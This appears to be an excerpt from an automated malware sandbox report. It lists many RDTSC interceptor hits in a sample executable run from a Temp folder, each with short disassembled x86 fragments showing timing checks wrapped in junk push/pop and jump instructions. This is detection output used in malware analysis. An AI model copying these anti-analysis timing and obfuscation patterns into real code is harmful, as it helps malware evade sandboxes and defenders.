                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A925F second address: 3A9263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93A0 second address: 3A93A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93A4 second address: 3A93B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93B2 second address: 3A93B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93B6 second address: 3A93BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93BC second address: 3A93C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93C2 second address: 3A93E6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d mov ecx, dword ptr [ebp+122D2CC5h] 0x00000013 push eax 0x00000014 pushad 0x00000015 jmp 00007F4785B0BF4Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93E6 second address: 3A93EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A950C second address: 3A9512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9512 second address: 3A9517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9AB6 second address: 3A9AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dh, 5Eh 0x0000000c push 0000001Eh 0x0000000e sub dword ptr [ebp+122D2D1Eh], eax 0x00000014 nop 0x00000015 push ebx 0x00000016 jmp 00007F4785B0BF54h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007F4785B0BF46h 0x00000026 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9AEB second address: 3A9AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CA0 second address: 3A9CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CA4 second address: 3A9CAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CAE second address: 3A9CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d ja 00007F4785B0BF46h 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CC2 second address: 3A9CCC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4784F102CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9EEC second address: 3A9EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9EF0 second address: 3A9EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9EF6 second address: 3A9F0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F0D second address: 3A9F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F12 second address: 3A9F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F17 second address: 3A9F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F4784F102C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, 64D6973Ah 0x00000029 jne 00007F4784F102CAh 0x0000002f mov dword ptr [ebp+122D1C67h], eax 0x00000035 lea eax, dword ptr [ebp+12499A18h] 0x0000003b cmc 0x0000003c mov dword ptr [ebp+122D1B78h], esi 0x00000042 nop 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 pop edi 0x00000049 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F6F second address: 3A9F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F75 second address: 3A9F7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F7A second address: 392249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F4785B0BF4Ah 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 nop 0x00000015 sub ecx, dword ptr [ebp+122D2B84h] 0x0000001b mov ecx, dword ptr [ebp+122D29A0h] 0x00000021 call dword ptr [ebp+122D2535h] 0x00000027 pushad 0x00000028 pushad 0x00000029 jg 00007F4785B0BF46h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EDB7C second address: 3EDB81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EDD0E second address: 3EDD14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE598 second address: 3EE59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE59C second address: 3EE5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE5A2 second address: 3EE5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 36CE96 second address: 36CEA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1261 second address: 3F127B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4784F102C6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F4784F102CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1561 second address: 3F1575 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4785B0BF48h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4785B0BF46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1575 second address: 3F1579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1579 second address: 3F15AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4785B0BF4Bh 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F15AB second address: 3F15B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F4784F102C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F517E second address: 3F518A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F4785B0BF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F518A second address: 3F51BB instructions: 0x00000000 rdtsc 0x00000002 js 00007F4784F102C8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b ja 00007F4784F102C6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F4784F102C6h 0x00000020 jmp 00007F4784F102D1h 0x00000025 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F51BB second address: 3F51CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F4785B0BF46h 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F51CB second address: 3F51D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F92CB second address: 3F92F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF55h 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c jc 00007F4785B0BF46h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F92F5 second address: 3F9302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4784F102C6h 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F9463 second address: 3F949D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F4785B0BF56h 0x0000000a push edx 0x0000000b jmp 00007F4785B0BF4Ah 0x00000010 pop edx 0x00000011 pushad 0x00000012 jnc 00007F4785B0BF46h 0x00000018 jmp 00007F4785B0BF4Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F95E6 second address: 3F95EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F95EA second address: 3F95EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F95EE second address: 3F9607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4784F102CFh 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F9791 second address: 3F97D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4785B0BF4Bh 0x00000011 jmp 00007F4785B0BF58h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F97D5 second address: 3F97D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F97D9 second address: 3F97E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3FC735 second address: 3FC739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3FC739 second address: 3FC74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jne 00007F4785B0BF4Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40230E second address: 402324 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4784F102C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 402324 second address: 402328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9898 second address: 3A98A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F4784F102C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 403467 second address: 40346B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40346B second address: 403477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 403477 second address: 40347B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40AAA1 second address: 40AAC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F4784F102CEh 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408AF3 second address: 408AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408AF9 second address: 408AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408AFD second address: 408B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F4785B0BF55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408C96 second address: 408CA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F4784F102CCh 0x0000000c jno 00007F4784F102C6h 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409418 second address: 409458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F4785B0BF46h 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F4785B0BF46h 0x0000001b popad 0x0000001c jnc 00007F4785B0BF4Ch 0x00000022 jp 00007F4785B0BF4Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409458 second address: 40945C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409686 second address: 40968A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40968A second address: 4096A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4784F102D3h 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096A5 second address: 4096A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096A9 second address: 4096C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4784F102D3h 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096C7 second address: 4096E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F4785B0BF56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4096E8 second address: 4096FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102CEh 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4099E1 second address: 4099FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF4Ch 0x00000009 popad 0x0000000a jo 00007F4785B0BF52h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4099FA second address: 409A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409CA3 second address: 409CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4785B0BF4Bh 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409CB6 second address: 409CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409F41 second address: 409F4B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 4100D5 second address: 4100DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
